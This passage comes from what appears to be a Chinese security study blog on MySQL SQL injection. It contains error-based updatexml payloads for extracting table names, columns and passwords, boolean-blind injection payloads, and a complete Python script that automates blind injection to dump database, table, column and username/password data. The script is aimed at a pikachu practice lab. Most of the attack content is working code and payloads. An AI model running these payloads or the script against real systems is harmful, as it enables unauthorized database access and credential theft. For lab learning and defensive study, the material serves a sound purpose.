class="line">1&#x27;or(updatexml(0,concat(0x5e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(&#x27;H4rDsq1&#x27;))),0))#</span><br><span class="line"></span><br><span class="line">#查看值</span><br><span class="line">1&#x27;or(updatexml(0,concat(0x5e,(select(group_concat(password))from(H4rDsq1))),0))#</span><br><span class="line"></span><br><span class="line">#查后半段</span><br><span class="line">1&#x27;or(updatexml(0,concat(0x5e,right((select(group_concat(password))from(H4rDsq1)),31)),0))#</span><br><span class="line">使用right阶段查看后面的内容</span><br></pre></td></tr></table></figure>

<h3 id="常规payload"><a href="#常规payload" class="headerlink" title="常规payload"></a>常规payload</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">?id=1&quot; union select updatexml(1,concat(0x2A,(select database()),0x2A),1)--+</span><br><span class="line"></span><br><span class="line">select updatexml(1,concat(0x2A,(select group_concat(table_name)from information_schema.`TABLES` where table_schema=&#x27;security&#x27; limit 0,1),0x2A),1) --+</span><br><span class="line"></span><br><span class="line">select updatexml(1,concat(0x7e,(select group_concat(username)from users limit 0,1),0x7e),1)</span><br><span class="line"></span><br><span class="line">select updatexml(1,concat(0x7e,(select group_concat(password)from users),0x7e),1)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h1><p>也就是无回显注入，select语句无法回显到前端，没有页面报错和数据库具体返回值</p>
<p>布尔盲注，时间盲注，报错盲注</p>
<h2 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h2><h3 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h3><p><code>ascii()</code></p>
<p>用法：SELECT ascii(‘e’);#将字母转换为ASCII码值，一次只能转换单个字符</p>
<p><code>substr()</code></p>
<p>用法：substr(string, int a, int b);#从第a位截取长度为b的字符串，</p>
<p>substr(string, int a);#从第a为截取后面的所有字符串</p>
<p><code>length()</code></p>
<p>用法：SELECT length(‘string’)#查询字符串的长度</p>
<p><code>left()</code></p>
<p>用法：left(‘string’,n)#string为要截取的字符串，n为长度</p>
<p>SELECT left(‘lin’,2)</p>
<p><code>mid()</code></p>
<p>用法：mid(string,strat,length)#start为其实位置，length为截取长度</p>
<p><code>regexp</code></p>
<p>用法:(‘string’)regexp ‘^[a-z]’#用来判断字符串中的第一个字符是否是在a-z范围内</p>
<p>这是正则匹配，匹配力强</p>
<p>SELECT (‘abcd’)regexp ‘a’,结果返回为真，也就是1</p>
<p><code>like</code></p>
<p>用法： SELECT (‘abcd’)like ‘a%’,模糊匹配，结果返回为真，例如%b%,%d,此类结果均返回真</p>
<p><code>if()</code></p>
<p>用法：if(condition, true,false),SELECT if(((‘abcd’)like ‘a%’),1,0);#第一个字符为a返回真</p>
<p>首先判断闭合符号”,)等，判断True界面和False界面</p>
<p>页面提交时进行了url编码，这里的查询也要更换成%E6%9F%A5%E8%AF%A2</p>
<p>默认闭合号是’–+,如果不一样要注意修改</p>
<p>过滤关键字的话，and-&gt;&amp;&amp;,注意替换</p>
<p>构造payload</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#查询数据库长度</span><br><span class="line">lili<span class="string">&#x27; and length((select database()))=int--+#int为数字，一直试验</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#爆库</span></span><br><span class="line"><span class="string">?id=1&#x27;</span> and <span class="title function_">ascii</span><span class="params">(substr((select database()</span>),<span class="number">1</span>,<span class="number">1</span>))&gt;=ASCII码--+</span><br><span class="line">?id=<span class="number">1</span><span class="string">&#x27; and ascii(substr((select database()),1,1))&lt;=ASCII码--+</span></span><br><span class="line"><span class="string">#用二分法将第一位字符验证出来</span></span><br><span class="line"><span class="string">?id=1&#x27;</span> and <span class="title function_">ascii</span><span class="params">(substr((select database()</span>),<span class="number">2</span>,<span class="number">1</span>))&gt;=ASCII码--+</span><br><span class="line">?id=<span class="number">1</span><span class="string">&#x27; and ascii(substr((select database()),2,1))&lt;=ASCII码--+</span></span><br><span class="line"><span class="string">#用二分法将第二位字符验证出来以此类推最终得到所有字符</span></span><br><span class="line"><span class="string">#一个个试很麻烦，可以直接bp爆破</span></span><br><span class="line"><span class="string">#之后再爆表爆列得到数据</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure>

<p>使用脚本，注意进行配置和修改</p>
<p>这个脚本只支持get传参，post需要增加request请求</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding:utf-<span class="number">8</span> -*-</span><br><span class="line"># Author: mochu7</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">def <span class="title function_">ascii_str</span><span class="params">()</span>:  # 生成库名表名字符所在的字符列表字典</span><br><span class="line">    str_list = []</span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(<span class="number">33</span>, <span class="number">127</span>)</span>:  # 所有可显示字符</span><br><span class="line">        str_list.append(chr(i))</span><br><span class="line">    # print(<span class="string">&#x27;可显示字符：%s&#x27;</span>%str_list)</span><br><span class="line">    <span class="keyword">return</span> str_list  # 返回字符列表</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">def <span class="title function_">db_length</span><span class="params">(url, str)</span>:</span><br><span class="line">    print(<span class="string">&quot;[-]开始测试数据库名长度.......&quot;</span>)</span><br><span class="line">    num = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> True:</span><br><span class="line">        db_payload = url + <span class="string">&quot;&#x27; and (length(database())=%d)--+ &amp;submit=查询#&quot;</span> % num#页面提交时进行了url编码，这里的查询也要更换成%E6%<span class="number">9F</span>%A5%E8%AF%<span class="type">A2</span></span><br><span class="line">        <span class="variable">r</span> <span class="operator">=</span> requests.get(db_payload)</span><br><span class="line">        <span class="keyword">if</span> str in r.text:</span><br><span class="line">            db_length = num</span><br><span class="line">            <span class="title function_">print</span><span class="params">(<span class="string">&quot;[+]数据库长度：%d\n&quot;</span> % db_length)</span></span><br><span class="line">            db_name(db_length)  # 进行下一步，测试库名</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            num += <span class="number">1</span></span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">def <span class="title function_">db_name</span><span class="params">(db_length)</span>:</span><br><span class="line">    print(<span class="string">&quot;[-]开始测试数据库名.......&quot;</span>)</span><br><span class="line">    db_name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    str_list = ascii_str()</span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(<span class="number">1</span>, db_length + <span class="number">1</span>)</span>:</span><br><span class="line">        <span class="keyword">for</span> j in str_list:</span><br><span class="line">            db_payload = url + <span class="string">&quot;&#x27; and (ord(mid(database(),%d,1))=&#x27;%s&#x27;)--+ &amp;submit=查询#&quot;</span> % (i, ord(j))</span><br><span class="line">            r = requests.get(db_payload)</span><br><span class="line">            <span class="keyword">if</span> str in r.text:</span><br><span class="line">                db_name += j</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="title function_">print</span><span class="params">(<span class="string">&quot;[+]数据库名：%s\n&quot;</span> % db_name)</span></span><br><span class="line">    tb_piece(db_name)  # 进行下一步，测试security数据库有几张表</span><br><span class="line">    <span class="keyword">return</span> db_name</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">def <span class="title function_">tb_piece</span><span class="params">(db_name)</span>:</span><br><span class="line">    print(<span class="string">&quot;开始测试%s数据库有几张表........&quot;</span> % db_name)</span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(<span class="number">100</span>)</span>:  # 猜解库中有多少张表，合理范围即可</span><br><span class="line">        tb_payload = url + <span class="string">&quot;&#x27; and %d=(select count(table_name) from information_schema.tables where table_schema=&#x27;%s&#x27;)--+&amp;submit=查询#&quot;</span> % (i, db_name)</span><br><span class="line">        r = requests.get(tb_payload)</span><br><span class="line">        <span class="keyword">if</span> str in r.text:</span><br><span class="line">            tb_piece = i</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="title function_">print</span><span class="params">(<span class="string">&quot;[+]%s库一共有%d张表\n&quot;</span> % (db_name, tb_piece)</span>)</span><br><span class="line">    tb_name(db_name, tb_piece)  # 进行下一步，猜解表名</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">def <span class="title function_">tb_name</span><span class="params">(db_name, tb_piece)</span>:</span><br><span class="line">    print(<span class="string">&quot;[-]开始猜解表名.......&quot;</span>)</span><br><span class="line">    table_list = []</span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(tb_piece)</span>:</span><br><span class="line">        str_list = ascii_str()</span><br><span class="line">        tb_length = <span class="number">0</span></span><br><span class="line">        tb_name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">        <span class="keyword">for</span> j in <span class="title function_">range</span><span class="params">(<span class="number">1</span>, <span class="number">20</span>)</span>:  # 表名长度，合理范围即可</span><br><span class="line">            tb_payload = url + <span class="string">&quot;&#x27; and (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d--+&amp;submit=查询#&quot;</span> % ( i, j)</span><br><span class="line">            r = requests.get(tb_payload)</span><br><span class="line">            <span class="keyword">if</span> str in r.text:</span><br><span class="line">                tb_length = j</span><br><span class="line">                <span class="title function_">print</span><span class="params">(<span class="string">&quot;第%d张表名长度：%s&quot;</span> % (i + <span class="number">1</span>, tb_length)</span>)</span><br><span class="line">                <span class="keyword">for</span> k in <span class="title function_">range</span><span class="params">(<span class="number">1</span>, tb_length + <span class="number">1</span>)</span>:  # 根据表名长度进行截取对比</span><br><span class="line">                    <span class="keyword">for</span> l in str_list:</span><br><span class="line">                        tb_payload = url + <span class="string">&quot;&#x27; and (select ord(mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%d--+&amp;submit=查询#&quot;</span> % ( i, k, ord(l))</span><br><span class="line">                        r = requests.get(tb_payload)</span><br><span class="line">                        <span class="keyword">if</span> str in r.text:</span><br><span class="line">                            tb_name += l</span><br><span class="line">                <span class="title function_">print</span><span class="params">(<span class="string">&quot;[+]：%s&quot;</span> % tb_name)</span></span><br><span class="line">                table_list.append(tb_name)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="title function_">print</span><span class="params">(<span class="string">&quot;\n[+]%s库下的%s张表：%s\n&quot;</span> % (db_name, tb_piece, table_list)</span>)</span><br><span class="line">    column_num(table_list, db_name)  # 进行下一步，猜解每张表的字段数</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">def <span class="title function_">column_num</span><span class="params">(table_list, db_name)</span>:</span><br><span class="line">    print(<span class="string">&quot;[-]开始猜解每张表的字段数：.......&quot;</span>)</span><br><span class="line">    column_num_list = []</span><br><span class="line">    <span class="keyword">for</span> i in table_list:</span><br><span class="line">        <span class="keyword">for</span> j in <span class="title function_">range</span><span class="params">(<span class="number">30</span>)</span>:  # 每张表的字段数量，合理范围即可</span><br><span class="line">            column_payload = url + <span class="string">&quot;&#x27; and %d=(select count(column_name) from information_schema.columns where table_name=&#x27;%s&#x27;)--+&amp;submit=查询#&quot;</span> % (j, i)</span><br><span class="line">            r = requests.get(column_payload)</span><br><span class="line">            <span class="keyword">if</span> str in r.text:</span><br><span class="line">                column_num = j</span><br><span class="line">                column_num_list.append(column_num)  # 把所有表的字段，依次放入这个列表当中</span><br><span class="line">                print(<span class="string">&quot;[+]%s表\t%s个字段&quot;</span> % (i, column_num))</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="title function_">print</span><span class="params">(<span class="string">&quot;\n[+]表对应的字段数：%s\n&quot;</span> % column_num_list)</span></span><br><span class="line">    column_name(table_list, column_num_list, db_name)  # 进行下一步，猜解每张表的字段名</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">def <span class="title function_">column_name</span><span class="params">(table_list, column_num_list, db_name)</span>:</span><br><span class="line">    print(<span class="string">&quot;[-]开始猜解每张表的字段名.......&quot;</span>)</span><br><span class="line">    column_length = []</span><br><span class="line">    str_list = ascii_str()</span><br><span class="line">    column_name_list = []</span><br><span class="line">    <span class="keyword">for</span> t in <span class="title function_">range</span><span class="params">(len(table_list)</span>):  # t在这里代表每张表的列表索引位置</span><br><span class="line">        print(<span class="string">&quot;\n[+]%s表的字段：&quot;</span> % table_list[t])</span><br><span class="line">        <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(column_num_list[t])</span>:  # i表示每张表的字段数量</span><br><span class="line">            column_name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">            <span class="keyword">for</span> j in <span class="title function_">range</span><span class="params">(<span class="number">1</span>, <span class="number">21</span>)</span>:  # j表示每个字段的长度</span><br><span class="line">                column_name_length = url + <span class="string">&quot;&#x27; and %d=(select length(column_name) from information_schema.columns where table_name=&#x27;%s&#x27; limit %d,1)--+&amp;submit=查询#&quot;</span> % (j - <span class="number">1</span>, table_list[t], i)</span><br><span class="line">                r = requests.get(column_name_length)</span><br><span class="line">                <span class="keyword">if</span> str in r.text:</span><br><span class="line">                    column_length.append(j)</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">for</span> k in str_list:  # k表示我们猜解的字符字典</span><br><span class="line">                    column_payload = url + <span class="string">&quot;&#x27; and ord(mid((select column_name from information_schema.columns where table_name=&#x27;%s&#x27; limit %d,1),%d,1))=%d--+&amp;submit=查询#&quot;</span> % (table_list[t], i, j, ord(k))</span><br><span class="line">                    r = requests.get(column_payload)</span><br><span class="line">                    <span class="keyword">if</span> str in r.text:</span><br><span class="line">                        column_name += k</span><br><span class="line">            <span class="title function_">print</span><span class="params">(<span class="string">&#x27;[+]：%s&#x27;</span> % column_name)</span></span><br><span class="line">            column_name_list.append(column_name)</span><br><span class="line">    # print(column_name_list)#输出所有表中的字段名到一个列表中</span><br><span class="line">    dump_data(table_list, column_name_list, db_name)  # 进行最后一步，输出指定字段的数据</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">def <span class="title function_">dump_data</span><span class="params">(table_list, column_name_list, db_name)</span>:</span><br><span class="line">    print(<span class="string">&quot;\n[-]对%s表的%s字段进行爆破.......\n&quot;</span> % (table_list[<span class="number">3</span>], column_name_list[<span class="number">9</span>:<span class="number">12</span>]))</span><br><span class="line">    str_list = ascii_str()</span><br><span class="line">    <span class="keyword">for</span> i in column_name_list[<span class="number">9</span>:<span class="number">12</span>]:  # id,username,password字段</span><br><span class="line">        <span class="keyword">for</span> j in <span class="title function_">range</span><span class="params">(<span class="number">101</span>)</span>:  # j表示有多少条数据，合理范围即可</span><br><span class="line">            data_num_payload = url + <span class="string">&quot;&#x27; and (select count(%s) from %s.%s)=%d--+&amp;submit=查询#&quot;</span> % (i, db_name, table_list[<span class="number">3</span>], j)</span><br><span class="line">            r = requests.get(data_num_payload)</span><br><span class="line">            <span class="keyword">if</span> str in r.text:</span><br><span class="line">                data_num = j</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="title function_">print</span><span class="params">(<span class="string">&quot;\n[+]%s表中的%s字段有以下%s条数据：&quot;</span> % (table_list[<span class="number">3</span>], i, data_num)</span>)</span><br><span class="line">        <span class="keyword">for</span> k in <span class="title function_">range</span><span class="params">(data_num)</span>:</span><br><span class="line">            data_len = <span class="number">0</span></span><br><span class="line">            dump_data = <span class="string">&#x27;&#x27;</span></span><br><span class="line">            <span class="keyword">for</span> l in <span class="title function_">range</span><span class="params">(<span class="number">1</span>, <span class="number">21</span>)</span>:  # l表示每条数据的长度，合理范围即可</span><br><span class="line">                data_len_payload = url + <span class="string">&quot;&#x27; and ascii(substr((select %s from %s.%s limit %d,1),%d,1))--+&amp;submit=查询#&quot;</span> % (i, db_name, table_list[<span class="number">3</span>], k, l)</span><br><span class="line">                r = requests.get(data_len_payload)</span><br><span class="line">                <span class="keyword">if</span> str not in r.text:</span><br><span class="line">                    data_len = l - <span class="number">1</span></span><br><span class="line">                    <span class="keyword">for</span> x in <span class="title function_">range</span><span class="params">(<span class="number">1</span>, data_len + <span class="number">1</span>)</span>:  # x表示每条数据的实际范围，作为mid截取的范围</span><br><span class="line">                        <span class="keyword">for</span> y in str_list:</span><br><span class="line">                            data_payload = url + <span class="string">&quot;&#x27; and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d--+&amp;submit=查询#&quot;</span> % (i, db_name, table_list[<span class="number">3</span>], k, x, ord(y))</span><br><span class="line">                            r = requests.get(data_payload)</span><br><span class="line">                            <span class="keyword">if</span> str in r.text:</span><br><span class="line">                                dump_data += y</span><br><span class="line">                                <span class="keyword">break</span></span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">            <span class="title function_">print</span><span class="params">(<span class="string">&#x27;[+]%s&#x27;</span> % dump_data)</span>  # 输出每条数据</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    url = <span class="string">&quot;http://pikachu.com/vul/sqli/sqli_blind_b.php?name=lili&quot;</span>  # 目标<span class="type">url</span></span><br><span class="line">    <span class="variable">str</span> <span class="operator">=</span> <span class="string">&quot;your uid:7&quot;</span>  # 布尔型盲注的<span class="literal">true</span>&amp;<span class="literal">false</span>的判断因素，填写结果为真的页面</span><br><span class="line">    db_length(url, str)  # 程序入口</span><br></pre></td></tr></table></figure>

<p>方法三：使用sqlmap</p>
<p>​</p>
<h2 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h2><ul>
<li>页面上没有显示位和SQL语句执行的错误信息</li>
<li>正确执行和错误执行的返回界面一样</li>
</ul>
<p>web页面只返回一个正常页面。利用页面响应时间不同，逐个猜解数据</p>
<h2 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h2><p>[bookmarklink]</p>
<hr>
<p>来源: <a target="_blank" rel="noopener" href="https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/hy77756dqhakbnan">https://www.yuque.com/guansuanbangzhuangganjun/oxmbxg/hy77756dqhakbnan</a><br>语雀文档ID: 135348752</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"># SQL注入</a>
              <a href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag"># Web安全</a>
              <a href="/tags/MySQL/" rel="tag"># MySQL</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/09/16/54-SSTI/" rel="prev" title="SSTI">
      <i class="fa fa-chevron-left"></i> SSTI
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/09/16/56-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" rel="next" title="文件上传">
      文件上传 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">SQL注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E4%B8%AA%E6%90%9E%E4%BA%86%E4%B8%80%E6%99%9A%E4%B8%8A%E7%9A%84%E5%9D%91"><span class="nav-number">2.</span> <span class="nav-text">一个搞了一晚上的坑</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MYSQL"><span class="nav-number">3.</span> <span class="nav-text">MYSQL</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E8%A1%8C"><span class="nav-number">3.1.</span> <span class="nav-text">命令行</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A8%E5%90%8D"><span class="nav-number">4.</span> <span class="nav-text">表名</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#floor-%E6%8A%A5%E9%94%99"><span class="nav-number">5.</span> <span class="nav-text">floor()报错</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#extractValue%E6%8A%A5%E9%94%99"><span class="nav-number">6.</span> <span class="nav-text">extractValue报错</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#updatexml%E6%8A%A5%E9%94%99"><span class="nav-number">7.</span> <span class="nav-text">updatexml报错</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5-1"><span class="nav-number">8.</span> <span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-number">8.1.</span> <span class="nav-text">数据库</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4"><span class="nav-number">8.2.</span> <span class="nav-text">命令</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SELECT-WHERE"><span class="nav-number">8.2.1.</span> <span class="nav-text">SELECT WHERE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CREATE-DEATABASE%E8%AF%AD%E5%8F%A5-%E5%88%9B%E5%BB%BA%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="nav-number">8.2.2.</span> <span class="nav-text">CREATE DEATABASE语句,创建数据库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#creat-table-%E5%88%9B%E5%BB%BA%E8%A1%A8"><span class="nav-number">8.2.3.</span> <span class="nav-text">creat table 创建表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E6%8F%92%E5%85%A5%EF%BC%8C%E5%A2%9E"><span class="nav-number">8.2.4.</span> <span class="nav-text">数据插入，增</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A0"><span class="nav-number">8.2.5.</span> <span class="nav-text">删</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%B9%EF%BC%8Cupdate"><span class="nav-number">8.2.6.</span> <span class="nav-text">改，update</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#and-%E5%92%8Cor-%E8%BF%90%E7%AE%97%E7%AC%A6"><span class="nav-number">8.2.7.</span> <span class="nav-text">and 和or 运算符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#union%E5%A4%9A%E8%A1%A8%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2"><span class="nav-number">8.2.8.</span> <span class="nav-text">union多表联合查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5-2"><span class="nav-number">8.2.9.</span> <span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">8.2.9.1.</span> <span class="nav-text">数字型注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">8.2.9.2.</span> <span class="nav-text">字符型注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%AD%A5%E9%AA%A4"><span class="nav-number">8.2.9.3.</span> <span class="nav-text">解题步骤</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#GROUP-CONCAT-%E5%87%BD%E6%95%B0"><span class="nav-number">8.2.10.</span> <span class="nav-text">GROUP_CONCAT()函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2"><span class="nav-number">8.2.11.</span> <span class="nav-text">联合查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87"><span class="nav-number">8.2.12.</span> <span class="nav-text">空格绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%9E%E6%93%8D"><span class="nav-number">8.2.13.</span> <span class="nav-text">实操</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-number">9.</span> <span class="nav-text"></span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%A3%E6%8C%87%E6%89%80%E6%9C%89%E7%9A%84%E6%84%8F%E6%80%9D"><span class="nav-number">10.</span> <span class="nav-text">*代指所有的意思</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%88%AA%E6%96%AD%E5%87%BD%E6%95%B0"><span class="nav-number">11.</span> <span 